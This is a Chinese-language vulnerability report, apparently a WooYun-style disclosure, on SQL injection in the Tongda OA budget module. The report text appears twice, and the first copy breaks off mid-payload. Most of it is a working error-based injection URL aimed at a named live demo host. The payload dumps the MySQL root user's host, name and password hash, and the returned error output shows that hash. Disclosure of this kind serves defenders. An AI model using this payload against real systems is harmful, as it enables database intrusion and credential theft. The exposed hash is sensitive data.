### 简要描述: 通达 ### 详细说明: 官网demo登录: http://www.day900.com/ cw 登陆有点鸡肋 注入点+payload: http://www.day900.com/general/budget/budget_process/budget_year_depts.php?DEPT_ID=1&DEPT_ID_PRIV=0&DEPT_IDS=1) and (select 1 from (select count(*),concat((select concat(host,user,password) from mysql.user limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)#)&YEAR=2015 返回: 请联系管理员 错误#1062: Duplicate entry 'localhostroot*91AF99F23C3D4ED85140D100433725DFA52BECEE1' for key 'group_key' SQL语句: SELECT COUNT(BUDGET_RESULT_ID) FROM BUDGET_RESULT WHERE FORMATION_WAY='Y' AND DEPT_ID IN (1) and (select 1 from (select count(*),concat((select concat(host,user,password) from mysql.user limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)#) AND ALLOW = '1' AND BUDGET_YEAR ='2015' 文件:/general/budget/budget_process/budget_year_depts.php ### 漏洞证明: 注入点+payload: http://www.day900.com/general/budget/budget_process/budget_year_depts.php?DEPT_ID=1&DEPT_ID_PRIV=0&DEPT_IDS=1) and...
### 简要描述: 通达 ### 详细说明: 官网demo登录: http://www.day900.com/ cw 登陆有点鸡肋 注入点+payload: http://www.day900.com/general/budget/budget_process/budget_year_depts.php?DEPT_ID=1&DEPT_ID_PRIV=0&DEPT_IDS=1) and (select 1 from (select count(*),concat((select concat(host,user,password) from mysql.user limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)#)&YEAR=2015 返回: 请联系管理员 错误#1062: Duplicate entry 'localhostroot*91AF99F23C3D4ED85140D100433725DFA52BECEE1' for key 'group_key' SQL语句: SELECT COUNT(BUDGET_RESULT_ID) FROM BUDGET_RESULT WHERE FORMATION_WAY='Y' AND DEPT_ID IN (1) and (select 1 from (select count(*),concat((select concat(host,user,password) from mysql.user limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)#) AND ALLOW = '1' AND BUDGET_YEAR ='2015' 文件:/general/budget/budget_process/budget_year_depts.php ### 漏洞证明: 注入点+payload: http://www.day900.com/general/budget/budget_process/budget_year_depts.php?DEPT_ID=1&DEPT_ID_PRIV=0&DEPT_IDS=1) and (select 1 from (select count(*),concat((select concat(host,user,password) from mysql.user limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)#)&YEAR=2015 返回: 请联系管理员 错误#1062: Duplicate entry 'localhostroot*91AF99F23C3D4ED85140D100433725DFA52BECEE1' for key 'group_key' SQL语句: SELECT COUNT(BUDGET_RESULT_ID) FROM BUDGET_RESULT WHERE FORMATION_WAY='Y' AND DEPT_ID IN (1) and (select 1 from (select count(*),concat((select concat(host,user,password) from mysql.user limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)#) AND ALLOW = '1' AND BUDGET_YEAR ='2015' 文件:/general/budget/budget_process/budget_year_depts.php